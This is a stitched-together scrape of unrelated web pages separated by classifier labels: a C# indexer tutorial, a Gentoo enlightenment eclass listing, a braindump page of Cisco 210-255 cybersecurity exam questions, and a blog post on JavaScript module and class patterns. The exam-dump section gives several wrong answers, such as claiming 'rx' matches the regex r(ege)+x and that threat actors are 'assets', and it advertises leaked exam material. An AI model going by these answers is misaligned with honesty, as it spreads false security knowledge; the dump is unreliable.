⇒”,本人的观点是否妥当,请赐教! 发表回复 您的电子邮箱地址不会被公开。 必填项已用 * 标注
__label__pos
0.986429
Monday, June 25, 2007 Indexer in C# Indexers allow you to index a class or a struct instance in the same way as an array. The systax is: [modifier] [return type] this [argument list] { get { // codes for get accessor } set { // codes for set accessor } } Here is the C# code: public class PersonIndexer { int[] _age=new int[2]; string[,] _name=new string[2,2]; public int this[int i] { get { return _age[i]; } set { _age[i] = value; } } public string this[int i,int j] { get { return _name[i, j]; } set { _name[i, j] = value; } } } static void Main() { PersonIndexer Ind = new PersonIndexer(); Ind[0] = 30; Ind[1] = 40; Ind[0, 0] = "sanjay"; Ind[0, 1] = "saini"; Ind[1, 0] = "Ram"; Ind[1, 1] = "Kumar"; MessageBox.Show(Ind[0, 0]+ " "+Ind[0, 1]+" is " + Convert.ToString(Ind[0])+" yrs. old."); MessageBox.Show(Ind[1, 0] + " " + Ind[1, 1] + " is " + Convert.ToString(Ind[1]) + " yrs. old."); } Note: 1. If you declare more than one indexer in the same class, they must have different signatures. 2. They can not be static. 3. They can also be inherited. 4. They can be overridden in the derived class and exibit polymorphism. 5. They can be created abstract in the class. Reference: http://www.csharphelp.com/archives/archive140.html No comments:  
__label__pos
0.999006
/[gentoo-x86]/eclass/enlightenment.eclass Gentoo Contents of /eclass/enlightenment.eclass Parent Directory Parent Directory | Revision Log Revision Log Revision 1.106 - (show annotations) (download) Fri Jul 11 08:21:58 2014 UTC (5 months, 2 weeks ago) by ulm Branch: MAIN CVS Tags: HEAD Changes since 1.105: +4 -4 lines Avoid reserved names for functions and variables, bug 516092. 1 # Copyright 1999-2014 Gentoo Foundation 2 # Distributed under the terms of the GNU General Public License v2 3 # $Header: /var/cvsroot/gentoo-x86/eclass/enlightenment.eclass,v 1.105 2013/10/12 15:30:23 aballier Exp $ 4 5 # @ECLASS: enlightenment.eclass 6 # @MAINTAINER: 7 # [email protected] 8 # @BLURB: simplify enlightenment package management 9 10 if [[ -z ${_ENLIGHTENMENT_ECLASS} ]]; then 11 _ENLIGHTENMENT_ECLASS=1 12 13 inherit eutils libtool 14 15 # @ECLASS-VARIABLE: E_PYTHON 16 # @DEFAULT_UNSET 17 # @DESCRIPTION: 18 # if defined, the package is based on Python/distutils 19 20 # @ECLASS-VARIABLE: E_CYTHON 21 # @DEFAULT_UNSET 22 # @DESCRIPTION: 23 # if defined, the package is Cython bindings (implies E_PYTHON) 24 25 # @ECLASS-VARIABLE: E_ECONF 26 # @DESCRIPTION: 27 # Array of flags to pass to econf (obsoletes MY_ECONF) 28 E_ECONF=() 29 30 # E_STATE's: 31 # release [default] 32 # KEYWORDS arch 33 # SRC_URI $P.tar.gz 34 # S $WORKDIR/$P 35 # 36 # snap $PV has .200##### datestamp or .### counter 37 # KEYWORDS ~arch 38 # SRC_URI $P.tar.bz2 39 # S $WORKDIR/$P 40 # 41 # live $PV has a 9999 marker 42 # KEYWORDS "" 43 # SRC_URI svn/etc... up 44 # S $WORKDIR/$E_S_APPEND 45 # 46 # Overrides: 47 # KEYWORDS EKEY_STATE 48 # SRC_URI EURI_STATE 49 # S EURI_STATE 50 51 E_LIVE_SERVER_DEFAULT_SVN="http://svn.enlightenment.org/svn/e/trunk" 52 E_LIVE_SERVER_DEFAULT_GIT="git://git.enlightenment.org" 53 54 E_STATE="release" 55 if [[ ${PV} == *9999* ]] ; then 56 if [[ ${EGIT_URI_APPEND} ]] ; then 57 E_LIVE_SERVER=${E_LIVE_SERVER:-${E_LIVE_SERVER_DEFAULT_GIT}} 58 EGIT_URI_APPEND=${EGIT_URI_APPEND:-${PN}} 59 EGIT_PROJECT="enlightenment/${EGIT_SUB_PROJECT}/${EGIT_URI_APPEND}" 60 EGIT_REPO_URI=${EGIT_SERVER:-${E_LIVE_SERVER_DEFAULT_GIT}}/${EGIT_SUB_PROJECT}/${EGIT_URI_APPEND}.git 61 E_S_APPEND=${EGIT_URI_APPEND} 62 E_LIVE_SOURCE="git" 63 inherit git-2 64 else 65 E_LIVE_SERVER=${E_LIVE_SERVER:-${E_LIVE_SERVER_DEFAULT_SVN}} 66 67 ESVN_URI_APPEND=${ESVN_URI_APPEND:-${PN}} 68 ESVN_PROJECT="enlightenment/${ESVN_SUB_PROJECT}" 69 ESVN_REPO_URI=${ESVN_SERVER:-${E_LIVE_SERVER_DEFAULT_SVN}}/${ESVN_SUB_PROJECT}/${ESVN_URI_APPEND} 70 E_S_APPEND=${ESVN_URI_APPEND} 71 E_LIVE_SOURCE="svn" 72 inherit subversion 73 fi 74 E_STATE="live" 75 WANT_AUTOTOOLS="yes" 76 77 elif [[ -n ${E_SNAP_DATE} ]] ; then 78 E_STATE="snap" 79 else 80 E_STATE="release" 81 fi 82 83 # Parse requested python state 84 : ${E_PYTHON:=${E_CYTHON}} 85 if [[ -n ${E_PYTHON} ]] ; then 86 PYTHON_DEPEND="2" 87 88 inherit python 89 fi 90 91 if [[ ${WANT_AUTOTOOLS} == "yes" ]] ; then 92 WANT_AUTOCONF=${E_WANT_AUTOCONF:-latest} 93 WANT_AUTOMAKE=${E_WANT_AUTOMAKE:-latest} 94 inherit autotools 95 fi 96 97 ENLIGHTENMENT_EXPF="src_unpack src_compile src_install" 98 case "${EAPI:-0}" in 99 2|3|4|5) ENLIGHTENMENT_EXPF+=" src_prepare src_configure" ;; 100 *) ;; 101 esac 102 EXPORT_FUNCTIONS ${ENLIGHTENMENT_EXPF} 103 104 DESCRIPTION="A DR17 production" 105 HOMEPAGE="http://www.enlightenment.org/" 106 if [[ -z ${SRC_URI} ]] ; then 107 case ${EURI_STATE:-${E_STATE}} in 108 release) SRC_URI="mirror://sourceforge/enlightenment/${P}.tar.gz";; 109 snap) SRC_URI="http://download.enlightenment.org/snapshots/${E_SNAP_DATE}/${P}.tar.bz2";; 110 live) SRC_URI="";; 111 esac 112 fi 113 114 LICENSE="BSD" 115 SLOT="0" 116 case ${EKEY_STATE:-${E_STATE}} in 117 release) KEYWORDS="alpha amd64 arm hppa ia64 ~mips ppc ppc64 sh sparc x86 ~amd64-fbsd ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos ~x86-macos ~x86-interix ~x86-solaris ~x64-solaris";; 118 snap) KEYWORDS="~alpha ~amd64 ~arm ~hppa ~ia64 ~mips ~ppc ~ppc64 ~sh ~sparc ~x86 ~amd64-fbsd ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos ~x86-macos ~x86-interix ~x86-solaris ~x64-solaris";; 119 live) KEYWORDS="";; 120 esac 121 IUSE="nls doc" 122 123 DEPEND="doc? ( app-doc/doxygen ) 124 ${E_PYTHON:+>=dev-python/setuptools-0.6_rc9} 125 ${E_CYTHON:+>=dev-python/cython-0.12.1}" 126 RDEPEND="nls? ( sys-devel/gettext )" 127 128 case ${EURI_STATE:-${E_STATE}} in 129 release) S=${WORKDIR}/${P};; 130 snap) S=${WORKDIR}/${P};; 131 live) S=${WORKDIR}/${E_S_APPEND};; 132 esac 133 134 enlightenment_src_unpack() { 135 if [[ ${E_STATE} == "live" ]] ; then 136 case ${E_LIVE_SOURCE} in 137 svn) subversion_src_unpack;; 138 git) git-2_src_unpack;; 139 *) die "eek!";; 140 esac 141 else 142 unpack ${A} 143 fi 144 if ! has src_prepare ${ENLIGHTENMENT_EXPF} ; then 145 cd "${S}" || die 146 enlightenment_src_prepare 147 fi 148 } 149 150 enlightenment_src_prepare() { 151 epatch_user 152 [[ -s gendoc ]] && chmod a+rx gendoc 153 if [[ ${WANT_AUTOTOOLS} == "yes" ]] ; then 154 [[ -d po ]] && eautopoint -f 155 # autotools require README, when README.in is around, but README 156 # is created later in configure step 157 [[ -f README.in ]] && touch README 158 export SVN_REPO_PATH=${ESVN_WC_PATH} 159 eautoreconf 160 fi 161 epunt_cxx 162 elibtoolize 163 } 164 165 enlightenment_src_configure() { 166 # gstreamer sucks, work around it doing stupid stuff 167 export GST_REGISTRY="${S}/registry.xml" 168 has static-libs ${IUSE} && E_ECONF+=( $(use_enable static-libs static) ) 169 170 econf ${MY_ECONF} "${E_ECONF[@]}" 171 } 172 173 enlightenment_src_compile() { 174 has src_configure ${ENLIGHTENMENT_EXPF} || enlightenment_src_configure 175 176 V=1 emake || die 177 178 if use doc ; then 179 if [[ -x ./gendoc ]] ; then 180 ./gendoc || die 181 elif emake -j1 -n doc >&/dev/null ; then 182 V=1 emake doc || die 183 fi 184 fi 185 } 186 187 enlightenment_src_install() { 188 V=1 emake install DESTDIR="${D}" || die 189 find "${D}" '(' -name CVS -o -name .svn -o -name .git ')' -type d -exec rm -rf '{}' \; 2>/dev/null 190 for d in AUTHORS ChangeLog NEWS README TODO ${EDOCS}; do 191 [[ -f ${d} ]] && dodoc ${d} 192 done 193 use doc && [[ -d doc ]] && dohtml -r doc/* 194 if has static-libs ${IUSE} ; then 195 use static-libs || find "${D}" -name '*.la' -exec rm -f {} + 196 fi 197 } 198 199 fi   ViewVC Help Powered by ViewVC 1.1.20  
__label__pos
0.72614
2017 March Cisco New 210-255: Implementing Cisco Cybersecurity Operations Exam Dumps (Full Version) Released Today! Free INSTANT Download 210-255 Exam Dumps (PDF & VCE) 70Q&As Download from www.Braindump2go.com  Today! 100% REAL Exam Questions! 100% Exam Pass Guaranteed! 1.|NEW 210-255 Exam Dumps (PDF & VCE) 70Q&As Download http://www.braindump2go.com/210-255.html 2.|NEW 210-255 Exam Questions & Answers: https://1drv.ms/f/s!AvI7wzKf6QBjgn5gut7hxGLZ6xws QUESTION 11 You see 100 HTTP GET and POST requests for various pages on one of your webservers. The user agent in the requests contain php code that, if executed, creates and writes to a new php file on the webserver. Which category does this event fall under as defined in the Diamond Model of Intrusion? A.    delivery B.    reconnaissance C.    action on objectives D.    installation E.    exploitation Answer: D QUESTION 12 Which string matches the regular expression r(ege)+x? A.    rx B.    regeegex C.    r(ege)x D.    rege+x Answer: A QUESTION 13   Refer to the exhibit. Which type of log is this an example of? A.    syslog B.    NetFlow log C.    proxy log D.    IDS log Answer: A QUESTION 14 Which element can be used by a threat actor to discover a possible opening into a target network and can also be used by an analyst to determine the protocol of the malicious traffic? A.    TTLs B.    ports C.    SMTP replies D.    IP addresses Answer: A QUESTION 15 Which stakeholder group is responsible for containment, eradication, and recovery in incident handling? A.    facilitators B.    practitioners C.    leaders and managers D.    decision makers Answer: A QUESTION 16   Refer to the exhibit. You notice that the email volume history has been abnormally high. Which potential result is true? A.    Email sent from your domain might be filtered by the recipient. B.    Messages sent to your domain may be queued up until traffic dies down. C.    Several hosts in your network may be compromised. D.    Packets may be dropped due to network congestion. Answer: C QUESTION 17 Drag and Drop Question   Refer to the exhibit. Drag and drop the element name from the left onto the correct piece of the NetFlow v5 record from a security event on the right.   Answer:   QUESTION 18 Which statement about threat actors is true? A.    They are any company assets that are threatened. B.    They are any assets that are threatened. C.    They are perpetrators of attacks. D.    They are victims of attacks. Answer: B QUESTION 19 Which data element must be protected with regards to PCI? A.    past health condition B.    geographic location C.    full name D.    recent payment amount Answer: D QUESTION 20 What mechanism does the Linux operating system provide to control access to files? A.    privileges required B.    user interaction C.    file permissions D.    access complexity Answer: C !!!RECOMMEND!!! 1.|NEW 210-255 Exam Dumps (PDF & VCE) 70Q&As Download http://www.braindump2go.com/210-255.html 2.|NEW 210-255 Study Guide Video: https://youtu.be/3fI6ShLlZQo
__label__pos
0.99425
19668 em algarismo romano Quanto é 19668 em algarismo romano? O número 19668 em algarismo romano é XIXDCLXVIII. Isto é, se você quiser escrever o dígito 19668 em números romanos, você deve usar o símbolo ou símbolos XIXDCLXVIII, já que estes numerais romanos são exatamente equivalentes ao número Dezenove e mil e seiscentos e sessenta e oito. 19668 = XIXDCLXVIII Como deve ser lido o número romano 19668? Os números romanos que simbolizam números devem ser lidos e escritos da esquerda para a direita e na ordem do maior para o menor valor. Portanto, no caso de encontrar em um texto o número representado por XIXDCLXVIII, ele deve ser lido em formato numérico natural. Em outras palavras, o numeral romano que representa o número 19668 devem ser lidos como "Dezenove e mil e seiscentos e sessenta e oito em algarismo romano". Como o número 19668 deve ser escrito em algarismos romanos? A única regra existente para escrever qualquer número em algarismos romanos, por exemplo o número 19668, é que eles devem ser sempre escritos com letras maiúsculas. 19668 em algarismo romano Go up
__label__pos
0.922339
Child pages • Automated Test All Relationships Skip to end of metadata Go to start of metadata Resource: Automated Test All Relationships ( /api/automatedtest/{id}/allrelationships ) A resource representing the set of relationships belonging to the Automated Test (includes the full graph of related entities, not just those which can be reached through destination and source->destination directed relationships). This resource supports the following methods: GET Methods GET Retrieves all relationships Required Permissions • TestManagement/ManageExecutions/View • TestManagement/ManageRequirements/View • TestManagement/ManageScripts/View • TestManagement/ManageIncidents/View Status Codes These are the expected status codes returned by the service. In addition, some other status codes may be returned if either an internal error occurs or there is an authentication issue (such as an expired OAuth token). StatusDescription 200 - OKReturned if the request was completed successfully. 403 - ForbiddenReturned if you do not have permission to view the relationships associated with this entity. 404 - NotFoundReturned if the entity does not exist. Example - Retrieve Relationships Retrieve relationships (the response is a generic example, and does not necessarily represent the type of relationships that would be returned for this Entity Type). Request Headers KeyValueDescription Acceptapplication/json Request Parameters KeyValueDescription {id}5E2814AF-1800-4C8F-B7C8-2ED9FADF98D0The ID of the entity to retrieve the relationships for Response Headers KeyValueDescription Content-Typeapplication/json; charset=utf-8 Response Body { "EntityId": "8F00D2CE-6243-4956-AF89-60B7B9755A9B", "Number": "1", "Name": "Some Script", "EntityType": "TestScript", "AssignedTo": "joeb", "Status": "Draft", "Priority": "High", "Type": "Functional", "PackageId": "c232382b-0c66-475b-b59b-8753d4c5377b", "PackageName": "Cycle 1", "PackageEntityType": "ScriptPackage", "PackagePath": "/Script Library/Cycle 1", "RelationshipId": null, "RelationshipTypeKey": "ScriptToRequirementCoverage", "RelationshipType": "Coverage", "Relation": "Covered By", "RelationshipDirection": "Source -> Destination", "CanDelete": true, "CanEdit": false, "Children": [ { "EntityId": "4155F037-B778-4E9D-B942-0CC237D51038", "Number": "2", "Name": "Some Requirement", "EntityType": "Requirement", "AssignedTo": "janed", "Status": "Draft", "Priority": "Medium", "Type": "Functional", "PackageId": "454bc5ca-3496-4abb-a69a-919bf5f3ca0b", "PackageName": "Cycle 1", "PackageEntityType": "RequirementPackage", "PackagePath": "/Requirements/Cycle 1", "RelationshipId": null, "RelationshipTypeKey": "ScriptToRequirementCoverage", "RelationshipType": "Coverage", "Relation": "Covered By", "RelationshipDirection": "Destination -> Source", "CanDelete": false, "CanEdit": true, "Children": [], "Links": [ { "Href": "http://localhost/api", "Rel": "Entity" } ] } ], "Links": [ { "Href": "http://localhost/api", "Rel": "Entity" } ] } Status Code 200 - OK • No labels
__label__pos
0.611797
Read More Magento with MySQL Master Slave Architecture In MySQL replication we can configure the database in such a way that single master database can replicate the data to multiple slaves, those will work as multiple read only databases. Now the question arises why you need such type of architecture ? If you have very less traffic on your magento store as well as there is no issue of system performance and backup then definitely you don’t but if you have a traffic of around 20000 users a day and want backup of your database to overcome the disastrous situations then it sounds like a medicine for your server. With this architecture we divide the read query traffic and write query traffic to different servers and increase the reliability and performance as compared to simple database architecture. As we know in simple database architecture if due to some reason our database goes down then the whole application hit the dead end which is definitely not a case in master slave architecture. Now the next question which is popping up in your mind “what exactly master slave architecture is” ? In Master Slave architecture we configure one database as a master and another database as a slave so that master database replicate its data to the slave which become the master when the primary master goes down and protect your application from hitting the dead end. Now the question arises how it help in improving the reliability and performance ? When an application communicate with the database, at that time database generates large amount of read query traffic as compared to write query thats why our database handle both type of traffic simultaneously which reduces the performance of the database as soon as the traffic on site increases. To overcome this problem master slave architecture divides the traffic over two databases in which it uses master for read or write queries and slave for only read queries. We can manage the traffic accordingly and improve the reliability and performance from application end.   Real Facts and Figures Currently all the facts and figures are recorded while using siege with around 20 concurrent users per second. Performance will be recorded more clearly when we test it on large scale with around 10000 concurrent users per second. image1 MySQL Queries when Magento and MySQL Database are on the same server   MySQL queries execution on master database   MySQL queries execution on slave database   MySQL Master Slave Implementation on Magento 1. Prepare three different servers using Ubuntu with Vagrant or any other virtualization method and install mysql server on two of the servers as well as Magento on one of the virtualized server.   2. Let there are three servers with given below IP addresses. Magento -: 192.168.1.241 Master -: 192.168.1.242 SLAVE -: 192.168.1.243   3. Edit the MySql configuration file of Master Server which is located at /etc/mysql/my.cnf Edit the the line bind-address = 127.0.0.1 to bind-address = 192.168.1.242 uncomment the line “server-id = 1” and give a unique ID to the server for example in our case we are giving unique ID which is 1. uncomment the log_bin = /var/log/mysql/mysql-bin.log now save the changes in the file and restart the mysql server by using command sudo service mysql restart   4. Edit the MySql configuration file of slave server which is located at /etc/mysql/my.cnf Again assign the slave server ip by editing the line bind-address = 127.0.0.1 to bind-address = 192.168.1.243 uncomment the line “server-id = 1” and give a unique ID to the server for example in our case we have assigned “server-id = 2” save the changes in the file and restart the mysql server using command sudo service mysql restart   5. Again login to master mysql server using ssh and login the mysql command line with your credentials. mysql -u root -p   6. Now we need a user for replication on master server so we create a user named as “replicate” by following command. create user 'replicate'@'%' identified by 'password'; By this command we create a user which can login from any IP address with the given password.   7. Now we grant the replication privileges to slave on all the databases with the ‘replicate’ user grant replication slave on *.* to 'replicate'@'%';   8. Now create a sample database for testing purpose. create database languages; create languages.oops (name varchar(20)); insert into languages.oops values ('java');   9. Now take the mysql dump of the whole database schema using command mysqldump -uroot –all-databases –master-data > masterdump.sql Now check the master_log_file and master_log_position by using command grep CHANGE *sql | head -1   10. After that transfer the mysql dump file to the slave server using scp or any other utility.   11. Now login to Slave mysql command shell and tell the slave regarding master by following commands. Change master to master_host = '192.168.1.242', master_user = 'replicate', master_password='password'; exit   12. After that restore the mysqldump on the slave mysql server mysql -uroot -p < masterdump.sql   13. Now we have to login the mysql shell of slave server and start the slave by following command start slave;   14. After that we can check the status of the slave by the command show slave status;   15. Now you can add any element in the master mysql database and it automatically replicate on the slave server.   16. Now switch to the server on which you have installed the magento. Edit the /app/etc/local.xml file of your magento <default_setup> <connection> <host><![CDATA[192.168.1.242]]></host> <username><![CDATA[username]]></username> <password><![CDATA[password]]></password> <dbname><![CDATA[magento]]></dbname> <active>1</active> </connection> </default_setup> <default_read> <connection> <use/> <host><![CDATA[192.168.1.243]]></host> <username><![CDATA[username]]></username> <password><![CDATA[password]]></password> <dbname><![CDATA[magento]]></dbname> <type>pdo_mysql</type> <model>mysql4</model> <initStatements>SET NAMES utf8</initStatements> <active>1</active> </connection> </default_read>   17. Now you can test the reliability and performance using munin or tcptrack utility of ubuntu.   Conclusion MySQL Master Slave replication has pros as well as cons, it divides the traffic of read and write query but still slave performs the write queries locally because it executes all the updates perform on the master database, still this architecture helps you to increase the functionality as well as reliability by providing you a backup of your database in the form of slave. So, we can say that if you want backup as well as high performance you can implement this architecture on your magento store. Comment Add Your Comment Be the first to comment. Need Any Help? Got Stuck with something serious or you wish to hire us for a while. We are here to hear from you, feel free to reach us and we'll get back to you as soon as possible. Contact Us css.php
__label__pos
0.777597
      Tutorial: init method init method Tutorial Details: init method Read Tutorial init method. Rate Tutorial: init method View Tutorial: init method Related Tutorials: Displaying 1 - 50 of about 8440 Related Tutorials. init method init method  why init method used in servlet?   The init() method is called only once by the servlet container throughout the life of a servlet. By this init() method the servlet get to know that it has been placed   Servlet Init method Servlet Init method  can we capture the form data into the init method of the servlet   init method of ActionServlet and RequestProcessor init method of ActionServlet and RequestProcessor  hi every when the ActionServlet init() method is executed? please give answer for the above query   init Method in Spring init Method in Spring       Calling Bean using init() method in Spring, this section describes ... the init method as shown below:- <bean id="mybean" class   Why servletcontainer can,t call the Init() method ? Why servletcontainer can,t call the Init() method ?  Why servletcontainer can,t call the Init() method   init Method in Spring init Method in Spring       Calling Bean using init() method in Spring, this section... the init() method .Here we have defined the property and values of  the bean   init Method in Spring init Method in Spring       Calling Bean using init() method in Spring, this section describes ... the init method as shown below:- <bean id="mybean" class   Counter in Init() Method : #000000; } Counter in Init() Method     .... In this program we are going to make use of the init method of the Servlet interface... which will have the initial value of the counter. The init() method accepts   Getting Init Parameter Names on the browser. To retrieve all the values of the init parameter use method... Getting Init Parameter Names       In this example we are going to retreive the init paramater   Init Parameter Init Parameter  How set Init Parameter in servlet   difference between init() & init(ServletConfig config)? difference between init() & init(ServletConfig config)?  I want to know the difference between init() and init(ServletConfig config) methods in GenericServlet   Access web.xml init parameters Access web.xml init parameters  How to access web.xml init parameters from java code   Init param - Java Beginners Init param  What is the correct syntax of init param?  Hello,Init parameters are added between the <init-param></init-param>...-name> <init-param> <param-name>emailHost</param-name>   Methods of Servlets (ServletConfig config) throws ServletException The init() method is called only...; The servlet cannot be put into the service if  The init() method does... a ServletException Parameters - The init() method takes a ServletConfig object   help to load information in init of application - Struts help to load information in init of application  Thanks for ur... question related to struts2 framework I want to keep some data in init... that is in init of the application , please remember, i am using struts2   what is web .config method ? For overriding init()method any rules are there There are no necessary conditions to override this particular method. In case you are overridding init... *The servlet is initialized by calling the init () method. *The servlet calls   What values initialized inside init() in servlet - Java Interview Questions What values initialized inside init() in servlet  What will happen inside init() in servlet. my interviewer asked servlet lifecycle. i said "once servlet is loaded in to memory init() will be called which performs servlet   how to maKE Jcombox editable after saveing value init. how to maKE Jcombox editable after saveing value init.  i have one JCombobox with 2 values"y", "N".when i selecting some value from dropdown... after saveing value init   method method   how and where, we can define methods ? can u explain me with full programme and using comments   method method  can you tell me how to write an abstract method called ucapan() for B2 class class A2{ void hello(){ system.out.println("hello from A2"); }} class B2 extends A2{ void hello(){ system.out.println("hello from B2   setStyle() and getStyle() method in Flex4 function init():void{ // set style using setStyle method...setStyle() and getStyle() method in Flex4: You can set the style properties of components using setStyle() and getStyle() method. But it will not set   String fromCharCode() method example in Action Script3 .style1 { font-size: medium; } String fromCharCode() method example in Action Script3:- String provide a method to find characters by the character code using fromCharCode() method. we have define a string using this method   post method does not support this url post method does not support this url  This is Get product servlet.... but I am receiving one error that is post method does not supported by this url... extends HttpServlet { public void init()throws ServletException   String substr method example .style1 { font-size: medium; } String substr() method example:- String class provides substr() method for find substring from string. This method...; creationComplete="init();"> <fx:Script> <![CDATA   String indexOf method example .style1 { font-size: medium; } String indexOf() method example:- String class method indexOf() is use to find the starting character position of the substring from the string. The indexOf() method start to search from   Flex Trace Method, Trace function in Flex the application like below. Clicking  the button calls the init() method which... and terminate button stops the debugging session. Flex Trace Method Example... mx.controls.Alert; public function init():void{ trace("Init started   method inside the method?? method inside the method??  can't we declare a method inside a method in java?? for eg: public class One { public static void main(String[] args) { One obj=new One(); One.add(); private static void add   Method Method       In this section, we will explore the concept of method in the reference of object oriented... and behaviors are defined by methods. Method : An brief introduction Methods   get method get method   how to use get method: secure method is post method and most of use post method why use a get method   method question method question  How do I figure out the difference in a method heading, a method body, and a method definition   String substring method example .style1 { font-size: medium; } String substring() method example... a string. String class provide methods for finding substring from string. Method... string. In this example we have used this method. Example:- <?xml   Method Overloading Method Overloading  In java can method be overloaded in different class   Method Overloading Method Overloading  In java can method be overloaded in different class   A method getColumnCount. A method getColumnCount.  There is a method getColumnCount in the JDBC API. Is there a similar method to find the number of rows in a result set   Class and Method declaration and definitions Class and Method declaration and definitions  ...; } method declaration; method declaration; @end...(){ MyClass *class = [[MyClass alloc]init]; [class setvara : 5]; [class setvarb   abstract method abstract method  is final method is in abstract class   String slice method example .style1 { font-size: medium; } String slice() method example.... In this example user can see how to use this method. Example:- <?xml version.../mx" creationComplete="init();"> <fx:Script>   method name method name  Is there any method which is equivalent to c++'s delay(int) function   gc() method gc() method  what is difference between java.lang.System class gc() method and java.lang.Runtime class gc() method   Static method Static method  what is a static method?   Have a look at the following link: Java Static Method   abstract method abstract method  Can a concrete class have an abstract method   main method main method  Why is the java main method static   Checkbox method Checkbox method  what is the method to check if the checkbox is checked   main method main method  What is the argument type of a program's main() method   Method overriding Method overriding  How compiler decide parent class'method or child class's method to call? What is the meaning of this: Parent obj=new child_obj   java method java method  can we declare a method in java like this static... book. i don't understand the static { } plz help me. what kind of method is it, what it do, what are the advantages of this kind of method? Answer me soon   _jspService() method _jspService() method  Why is jspService() method starting with an '' while other life cycle methods do not?   jspService() method... don't override _jspService() method in any JSP page   finalize() method finalize() method  Can an object's finalize() method be invoked while it is reachable?  An object?s finalize() method cannot be invoked... finalize() method may be invoked by other objects   Method overriding Method overriding  can a method declared in one package be over ridden in a different package?   A subclass in a different package can only override the non-final methods declared public or protected   method overloading method overloading  public void test(int a){} public void test(long a){} i will call some x.test(125) which method is called pls tell me   Site navigation Advertisement Resources Links
__label__pos
0.969899
Helpful JavaScript Design Patterns JavaScript patternsSo you write JavaScript. That’s pretty much a given for today’s modern web apps. Unfortunately, JavaScript doesn’t always get the organization it deserves and ends up being a procedural mess of jQuery on ready statements. In this post, I’m going to show you two of my favorite patterns for keeping JavaScript well organized. But before I do, let’s go over a few prerequisites. Namespace Your Code One of the worst and most common JavaScript mistakes is assigning variable onto the global namespace (aka ‘window’) if you’re running JavaScript in a browser. This can lead to conflicting functions between you and other developers. And is just, well, messy. The best way to avoid to do this is namespacing as shown in this example: [sourcecode language="javascript"] window.NR = window.NR || {}; window.NR.myFunction = function () { // your code… }; [/sourcecode] And avoid this example: [sourcecode language="javascript"] function myFunction () {   // your code… }; [/sourcecode] Use Strict Mode Even inside a namespaced function, there can still be a problem. You can accidentally assign variables to the global namespace. To prevent this, prefix all variable declarations with var or this. Alternatively, you can use strict mode. As the name implies, strict mode parses your JavaScript in a much stricter format. For example, if you attempt to set a variable that is not yet defined, it will through an error instead of assigning to global / window. If you’re interested in learning more about strict mode, check out this article on John Resig’s blog. Lint your JavaScript JSLint evaluates your JavaScript against Douglas Crockford’s coding suggestions. There are plugins for most of the popular editors to evaluate code including Sublime Text 2, Textmate and Vim. The main benefits of using JSLint are: * Your code is checked for errors before running, saving you time and debugging effort. * Sharing linted code in a team unifies coding styles, making code more readable and consistent. Even if you disagree with some of Douglas’s assertions about how your code should be formatted, you should still use JSLint. You can opt out of the rules with preference setting or comments on the top of your JavaScript file. I prefer using comments because it gets parsed in the same way when another developer works on you file. This prevents you from getting conflicting parsing results when one of your teammates sets different preferences. To give you example, here are my standard JSLint configuration setting comments: [sourcecode language="javascript"] /*global NR:true, jQuery:true, Backbone:true, $:true*/ /*jslint browser: true, white: true, vars: true, devel: true, bitwise: true, debug: true, nomen: true, sloppy: false, indent: 2*/ [/sourcecode] The global declarations tell JSLint which variables to expect on the global namespace – JQuery, Backbone, etc. If it encounters other, it will throw and error. The JSLint options determine what rules are opted into or out of. See the full list of rules on the JSLint website. OK! Now that’s out of the way, let’s look at a couple of JavaScript patterns I commonly use. The Module The module pattern is great if you only need one, such as in a navigation system, and you want to be able to access the object from any scope. By convention, a module should be camelCased with a lower case first letterer. There are many benefits and drawbacks to using the module pattern: Pros: * There’s no need to instantiate, just begin calling methods on it. * It’s accessible from anywhere. There’s no need to retain a handle to your instance. * It keeps state and variable values. Cons: * You can only have one. Don’t make ten of these for each type of item on the DOM or a similar situation. * You don’t have a constructor function, so it won’t be fired automatically like with an instance. * If you need initialization on the module, you need to call it manually the first time it’s used. Here’s an example module: [sourcecode language="javascript"] (function () { "use strict"; window.NR = window.NR || {}; window.NR.myModule = { myVariable: "foo", initialize: function () { // your initialization code here }, anotherMethod: function () { this.myVariable = "foobar"; } }; }()); [/sourcecode] And here’s how it can be used: [sourcecode language="javascript"] NR.myModule.initialize(); NR.myModule.anotherMethod(); console.log(NR.myModule.myVariable); // outputs // "foobar" [/sourcecode] Classes Some people will argue that your should never use ‘new’ when working with JavaScript as there are no true classes in the language. However, I find this pattern extremely helpful for a number of reasons described below. Also, many popular frameworks such as Backbone use class instantiation / extension patterns. Naming conventions for classes is CamelCase with an upper case first letter. Some of the benefits of this pattern are: * It’s great for when you have many of an item and each needs its own state. * It’s a familiar OOP pattern / workflow for many developers. * It has a constructor function that’s immediately fired on instantiation. But the drawbacks are: * You have to remember to instantiate before you can use it. If you don’t, it will cause errors. * You have to keep a handle to the instance that’s returned from the constructor. Here’s an example class: [sourcecode language="javascript"] window.NR = window.NR || {}; window.NR.MyClass = (function () { "use strict"; function MyClass(val) { this.instanceVar = MyClass.staticVar + val; } MyClass.staticVar = "prefix-"; var instanceVar = ""; MyClass.prototype.exampleFunction = function () { alert(‘i am an additional function’); }; return MyClass; }()); [/sourcecode] And how it can be used: [sourcecode language="javascript"] var instance1 = new NR.MyClass(‘class 1′); console.log(instance1.instanceVar); NR.MyClass.staticVar = ‘PREFIX-‘; var instance2 = new NR.MyClass(‘class 2′); console.log(instance2.instanceVar); // Outputs // "prefix-class 1" // "PREFIX-class 2" [/sourcecode] Summary I hope these patterns help you keep your JavaScript better organized. What other patterns do you use? Share yours in the comments below. [email protected]' View posts by . Interested in writing for New Relic Blog? Send us a pitch!
__label__pos
0.667985
